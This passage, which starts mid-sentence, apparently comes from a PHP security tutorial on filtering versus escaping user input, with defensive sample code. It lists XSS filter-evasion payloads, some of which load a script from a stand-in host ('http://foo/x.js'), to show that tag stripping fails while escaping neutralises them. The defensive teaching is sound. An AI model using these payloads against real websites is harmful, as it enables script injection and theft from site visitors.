things like backslashes or entity tags found in stored data. This is all very well and good, but what happens if you want to put this into an email message or save it out to a text document? “Strip out all tags!” can result in mangled content, e.g. <3, <( ^o^)>, 1 < x < 5, “if foo <> bar then”.
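To make the mangling concrete, here is a minimal sketch that runs the sample strings above through PHP's built-in strip_tags() and, for contrast, through htmlspecialchars(). The helper names are hypothetical; what strip_tags() drops can vary by input, so the script prints the results rather than asserting them.

```php
<?php
// Sample strings from the text above; none of them is really an HTML tag.
$samples = ['<3', '<( ^o^)>', '1 < x < 5', 'if foo <> bar then'];

// Filtering: strip_tags() guesses what is markup and throws it away.
function filter_for_html(string $text): string
{
    return strip_tags($text);
}

// Escaping: nothing is thrown away, the text is only packaged for HTML.
function escape_for_html(string $text): string
{
    return htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
}

foreach ($samples as $original) {
    printf(
        "original: %-22s stripped: %-22s escaped: %s\n",
        var_export($original, true),
        var_export(filter_for_html($original), true),
        escape_for_html($original)
    );
}
```

The escaped form can always be turned back into the original text with htmlspecialchars_decode(), so the same stored data is still usable for an email or a text file. Whatever strip_tags() removed is gone for good.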
getting rid of the nasties. Checking that data is of the correct type, e.g. email addresses, postcodes, message text. Stripping out control characters, fixing multibyte encoding shenanigans with iconv().
Escaping: Packaging data up for transport. mysql_real_escape_string() for MySQL strings (the mysql_* extension was removed in PHP 7; use mysqli_real_escape_string() or prepared statements there). htmlentities($x, ENT_QUOTES, 'UTF-8') for HTML. urlencode() for query params.
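The two jobs can be sketched separately, as below. The function names clean_text() and is_valid_email(), the sample comment, and the search.php URL are illustrative assumptions, not part of the original material. The database case is left out because it needs a live connection. The iconv() fallback is there because some builds return false on invalid input instead of ignoring it.

```php
<?php
// Filtering: reject or clean data that is not what we expect.
function clean_text(string $text): string
{
    // Drop byte sequences that are not valid UTF-8. Some iconv builds
    // return false here instead of ignoring them, hence the fallback.
    $utf8 = @iconv('UTF-8', 'UTF-8//IGNORE', $text);
    if ($utf8 === false) {
        $utf8 = '';
    }
    // Remove control characters but keep tab, newline and carriage return.
    return preg_replace('/[\x00-\x08\x0B\x0C\x0E-\x1F\x7F]/', '', $utf8);
}

function is_valid_email(string $email): bool
{
    return filter_var($email, FILTER_VALIDATE_EMAIL) !== false;
}

// Escaping: package already-clean data for one specific destination.
$comment = clean_text("I <3 \"PHP\" & tea\x07"); // \x07 is a stray bell character

$forHtml = htmlentities($comment, ENT_QUOTES, 'UTF-8');
$forUrl  = 'search.php?q=' . urlencode($comment);

echo $forHtml, "\n"; // I &lt;3 &quot;PHP&quot; &amp; tea
echo $forUrl, "\n";  // search.php?q=I+%3C3+%22PHP%22+%26+tea

var_dump(is_valid_email('someone@example.com')); // bool(true)
var_dump(is_valid_email('<script>@example'));    // bool(false)
```

Note that the same cleaned string is escaped twice, once per destination. Escaping belongs at the point of output, not at the point of storage.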
<script> tags we find?
<IMG SRC=javascript:alert('a')>
<img src=javascript:alert("a")>
<img """><script>alert('a')</script>">
<IMG SRC=javascr ipt:aler t('XSS')>
<IMG SRC=javascr ipt:aler t('XSS')>
<IMG SRC="jav ascript:alert('a');">
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<SCR\0IPT>alert('a')</SCR\0IPT>
<SCRIPT/a SRC="http://foo/x.js"></SCRIPT>
<img onmouseover!#$%&=alert('a')>
<<SCRIPT>alert("a");//<</SCRIPT>
<SC<SCRIPT>RIPT>alert('a');</SC</SCRIPT>RIPT>
<SC\0RIPT SRC=http://foo/x.js?<B>
<script src=//foo/x.js>
<img src="javascript:alert('a')"
<IMG SRC = " j a v a s c r i p t : a l e r t ( ' a ' ) " >
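As a rough illustration of why tag stripping loses this game, the sketch below runs two of the strings above through a deliberately naive filter. strip_script_tags() is a hypothetical stand-in for a home-grown blacklist, not a function from PHP or from the original material.

```php
<?php
// Hypothetical naive filter: delete anything that looks like a <script> tag.
function strip_script_tags(string $html): string
{
    return preg_replace('#</?script[^>]*>#i', '', $html);
}

// Nested tags: removing the inner tags reassembles the outer ones.
$nested = "<SC<SCRIPT>RIPT>alert('a');</SC</SCRIPT>RIPT>";
echo strip_script_tags($nested), "\n";
// <SCRIPT>alert('a');</SCRIPT>

// No script tag at all, so the filter has nothing to remove.
$image = "<IMG SRC=javascript:alert('a')>";
echo strip_script_tags($image), "\n";
// <IMG SRC=javascript:alert('a')>

// Escaping does not care what the markup says: every < becomes &lt;.
echo htmlentities($nested, ENT_QUOTES, 'UTF-8'), "\n";
echo htmlentities($image, ENT_QUOTES, 'UTF-8'), "\n";
```

Running the filter in a loop until the output stops changing would fix the nested case, but not the image case, and each further patch invites another bypass.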
HTML; package it appropriately. Using htmlentities($xsslol, ENT_QUOTES, 'UTF-8') will completely neuter most of this stuff. Use it even on the things you “trust”, like $_SERVER['PHP_SELF'] or REQUEST_URI. It gets hard when you need to put user data into src="" and style="" attributes; use a whitelist instead, no matter how much of a pain it is to implement. (Or, in the case of images and other files, generate the filenames for them yourself.)
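One possible shape for the whitelist and the generated filename is sketched below. The function names, the allowed schemes and the allowed extensions are assumptions chosen for illustration; a real application would pick its own lists. random_bytes() needs PHP 7 or later.

```php
<?php
// Shorthand for the escaping call used throughout.
function e(string $text): string
{
    return htmlentities($text, ENT_QUOTES, 'UTF-8');
}

// Whitelist for src="": only absolute http(s) URLs with a host get through.
// Returns the escaped URL, or null if the URL is not on the whitelist.
function safe_image_src(string $url): ?string
{
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null;
    }
    return e($url);
}

// Generated filename: keep nothing from the upload except a whitelisted
// extension; the rest of the name is random.
function generated_filename(string $uploadName): ?string
{
    $extension = strtolower(pathinfo($uploadName, PATHINFO_EXTENSION));
    if (!in_array($extension, ['png', 'jpg', 'jpeg', 'gif'], true)) {
        return null;
    }
    return bin2hex(random_bytes(16)) . '.' . $extension;
}

var_dump(safe_image_src("javascript:alert('a')"));       // NULL
var_dump(safe_image_src('//foo/x.js'));                  // NULL
var_dump(safe_image_src('https://example.com/cat.png')); // string, unchanged
var_dump(generated_filename('../../evil<script>.PNG'));  // 32 hex chars + ".png"
var_dump(generated_filename('shell.php'));               // NULL

// Even "trusted" server values are escaped before they reach the page.
echo '<form action="', e($_SERVER['PHP_SELF'] ?? ''), '">', "\n";
```

The whitelist rejects by default: anything that is not recognisably an absolute http or https URL is refused, rather than trying to enumerate every javascript: spelling from the list above.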